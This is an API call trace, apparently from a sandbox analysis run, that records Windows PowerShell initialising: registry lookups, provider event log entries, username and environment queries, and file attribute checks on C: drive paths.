	[0564.511] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x39c) returned 0x0
	[0564.511] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0564.512] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x3a0) returned 0x0
	[0564.512] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x3a4) returned 0x0
	[0564.512] RegCloseKey (hKey=0x3a4) returned 0x0
	[0564.512] RegCloseKey (hKey=0x380) returned 0x0
	[0564.512] RegCloseKey (hKey=0x3a0) returned 0x0
	[0564.517] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1bbb0008
	[0565.773] ReportEventW (hEventLog=0x1bbb0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x353a5a8*="WSMan", lpRawData=0x353a318) returned 1
	[0565.774] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0565.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.774] CoTaskMemFree (pv=0x19bc80) 
	[0565.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0565.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0565.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0565.777] CoTaskMemAlloc (cb=0x804) returned 0x1b9805c0
	[0565.777] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9805c0, nSize=0x24d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d548) returned 0x1
	[0565.777] CoTaskMemFree (pv=0x1b9805c0) 
	[0565.777] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0565.777] GetUserNameW (in: lpBuffer=0x1394c0, pcbBuffer=0x24d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d588) returned 1
	[0565.777] CoTaskMemFree (pv=0x1394c0) 
	[0565.778] ReportEventW (hEventLog=0x1bbb0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x353fae0*="Alias", lpRawData=0x353f870) returned 1
	[0565.779] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0565.779] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.779] CoTaskMemFree (pv=0x19bc80) 
	[0565.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0565.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0565.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0565.781] CoTaskMemAlloc (cb=0x804) returned 0x1b9805c0
	[0565.781] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9805c0, nSize=0x24d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d548) returned 0x1
	[0565.781] CoTaskMemFree (pv=0x1b9805c0) 
	[0565.781] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0565.782] GetUserNameW (in: lpBuffer=0x1394c0, pcbBuffer=0x24d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d588) returned 1
	[0565.782] CoTaskMemFree (pv=0x1394c0) 
	[0565.782] ReportEventW (hEventLog=0x1bbb0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35450d8*="Environment", lpRawData=0x3544e68) returned 1
	[0565.783] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0565.783] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.783] CoTaskMemFree (pv=0x19bc80) 
	[0565.785] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0565.785] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0565.785] CoTaskMemFree (pv=0x19bc80) 
	[0565.785] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0565.785] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0565.785] CoTaskMemFree (pv=0x19bc80) 
	[0565.785] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0565.785] SetErrorMode (uMode=0x1) returned 0x1
	[0565.785] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0565.786] SetErrorMode (uMode=0x1) returned 0x1
	[0565.787] GetLogicalDrives () returned 0x4
	[0565.787] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0565.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0565.788] SetErrorMode (uMode=0x1) returned 0x1
	[0565.789] CoTaskMemAlloc (cb=0x68) returned 0x19abc0
	[0565.789] CoTaskMemAlloc (cb=0x68) returned 0x19ab50
	[0565.789] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x19abc0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x24d2d0, lpMaximumComponentLength=0x24d2cc, lpFileSystemFlags=0x24d2c8, lpFileSystemNameBuffer=0x19ab50, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24d2d0*=0x9c354b42, lpMaximumComponentLength=0x24d2cc*=0xff, lpFileSystemFlags=0x24d2c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0565.790] CoTaskMemFree (pv=0x19abc0) 
	[0565.790] CoTaskMemFree (pv=0x19ab50) 
	[0565.790] SetErrorMode (uMode=0x1) returned 0x1
	[0565.790] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0565.791] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d010, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0565.791] SetErrorMode (uMode=0x1) returned 0x1
	[0565.791] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d270 | out: lpFileInformation=0x24d270*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0565.791] SetErrorMode (uMode=0x1) returned 0x1
	[0565.791] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d010, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0565.791] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0565.791] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0565.792] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0565.792] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0565.793] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0565.793] SetErrorMode (uMode=0x1) returned 0x1
	[0565.793] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d0a0 | out: lpFileInformation=0x24d0a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0565.793] SetErrorMode (uMode=0x1) returned 0x1
	[0565.793] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0565.793] SetErrorMode (uMode=0x1) returned 0x1
	[0565.793] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d0a0 | out: lpFileInformation=0x24d0a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0565.793] SetErrorMode (uMode=0x1) returned 0x1
	[0565.794] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0565.794] SetErrorMode (uMode=0x1) returned 0x1
	[0565.794] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d140 | out: lpFileInformation=0x24d140*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0565.794] SetErrorMode (uMode=0x1) returned 0x1
	[0565.794] CoTaskMemAlloc (cb=0x804) returned 0x1b9805c0
	[0565.794] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9805c0, nSize=0x24d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d548) returned 0x1
	[0565.795] CoTaskMemFree (pv=0x1b9805c0) 
	[0565.795] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0565.795] GetUserNameW (in: lpBuffer=0x1394c0, pcbBuffer=0x24d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d588) returned 1
	[0565.795] CoTaskMemFree (pv=0x1394c0) 
	[0565.796] ReportEventW (hEventLog=0x1bbb0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x354c1c8*="FileSystem", lpRawData=0x354bf58) returned 1
	[0565.797] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0565.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.797] CoTaskMemFree (pv=0x19bc80) 
	[0565.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0565.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0565.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0565.799] CoTaskMemAlloc (cb=0x804) returned 0x1b9805c0
	[0565.799] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9805c0, nSize=0x24d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d548) returned 0x1
	[0565.799] CoTaskMemFree (pv=0x1b9805c0) 
	[0565.799] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0565.799] GetUserNameW (in: lpBuffer=0x1394c0, pcbBuffer=0x24d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d588) returned 1
	[0565.799] CoTaskMemFree (pv=0x1394c0) 
	[0565.800] ReportEventW (hEventLog=0x1bbb0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3551a08*="Function", lpRawData=0x3551798) returned 1
	[0565.803] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0565.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.803] CoTaskMemFree (pv=0x19bc80) 
	[0567.071] CoTaskMemAlloc (cb=0x804) returned 0x1b9805c0
	[0567.071] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9805c0, nSize=0x24d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d548) returned 0x1
	[0567.072] CoTaskMemFree (pv=0x1b9805c0) 
	[0567.072] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0567.072] GetUserNameW (in: lpBuffer=0x1394c0, pcbBuffer=0x24d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d588) returned 1
	[0567.072] CoTaskMemFree (pv=0x1394c0) 
	[0567.072] ReportEventW (hEventLog=0x1bbb0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3574230*="Registry", lpRawData=0x3573fc0) returned 1
	[0568.439] CoTaskMemAlloc (cb=0x804) returned 0x1b9805c0
	[0568.439] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9805c0, nSize=0x24d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d548) returned 0x1
	[0568.440] CoTaskMemFree (pv=0x1b9805c0) 
	[0568.440] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0568.440] GetUserNameW (in: lpBuffer=0x1394c0, pcbBuffer=0x24d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d588) returned 1
	[0568.440] CoTaskMemFree (pv=0x1394c0) 
	[0568.440] ReportEventW (hEventLog=0x1bbb0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3579648*="Variable", lpRawData=0x35793d8) returned 1
	[0568.441] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0568.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0568.441] CoTaskMemFree (pv=0x19bc80) 
	[0568.442] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0568.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0568.442] CoTaskMemFree (pv=0x19bc80) 
	[0568.481] CoTaskMemAlloc (cb=0x804) returned 0x1b9805c0
	[0568.481] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9805c0, nSize=0x24d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d548) returned 0x1
	[0569.934] CoTaskMemFree (pv=0x1b9805c0) 
	[0569.934] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0569.934] GetUserNameW (in: lpBuffer=0x1394c0, pcbBuffer=0x24d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d588) returned 1
	[0569.935] CoTaskMemFree (pv=0x1394c0) 
	[0569.935] ReportEventW (hEventLog=0x1bbb0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x358d260*="Certificate", lpRawData=0x358cff0) returned 1
	[0571.501] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0571.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.501] CoTaskMemFree (pv=0x19bc80) 
	[0571.504] GetLogicalDrives () returned 0x4
	[0571.504] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0571.505] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0571.506] CoTaskMemAlloc (cb=0x20e) returned 0x184750
	[0571.506] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x184750 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0571.506] CoTaskMemFree (pv=0x184750) 
	[0571.507] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0571.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.508] CoTaskMemFree (pv=0x19bc80) 
	[0571.508] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0571.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.508] CoTaskMemFree (pv=0x19bc80) 
	[0571.526] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0571.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.526] CoTaskMemFree (pv=0x19bc80) 
	[0571.527] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0571.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.527] CoTaskMemFree (pv=0x19bc80) 
	[0571.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0571.528] SetErrorMode (uMode=0x1) returned 0x1
	[0571.528] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d190 | out: lpFileInformation=0x24d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0571.528] SetErrorMode (uMode=0x1) returned 0x1
	[0571.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0571.528] SetErrorMode (uMode=0x1) returned 0x1
	[0571.528] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d190 | out: lpFileInformation=0x24d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0571.529] SetErrorMode (uMode=0x1) returned 0x1
	[0571.529] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0571.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.529] CoTaskMemFree (pv=0x19bc80) 
	[0571.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0571.535] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0571.535] SetErrorMode (uMode=0x1) returned 0x1
	[0571.535] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d150 | out: lpFileInformation=0x24d150*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0571.535] SetErrorMode (uMode=0x1) returned 0x1
	[0571.536] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0571.536] SetErrorMode (uMode=0x1) returned 0x1
	[0571.536] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d150 | out: lpFileInformation=0x24d150*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0571.536] SetErrorMode (uMode=0x1) returned 0x1
	[0571.536] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0571.536] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24ce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0571.536] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0571.536] SetErrorMode (uMode=0x1) returned 0x1
	[0571.537] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d150 | out: lpFileInformation=0x24d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0571.537] SetErrorMode (uMode=0x1) returned 0x1
	[0571.537] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0571.537] SetErrorMode (uMode=0x1) returned 0x1
	[0571.537] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d150 | out: lpFileInformation=0x24d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0571.537] SetErrorMode (uMode=0x1) returned 0x1
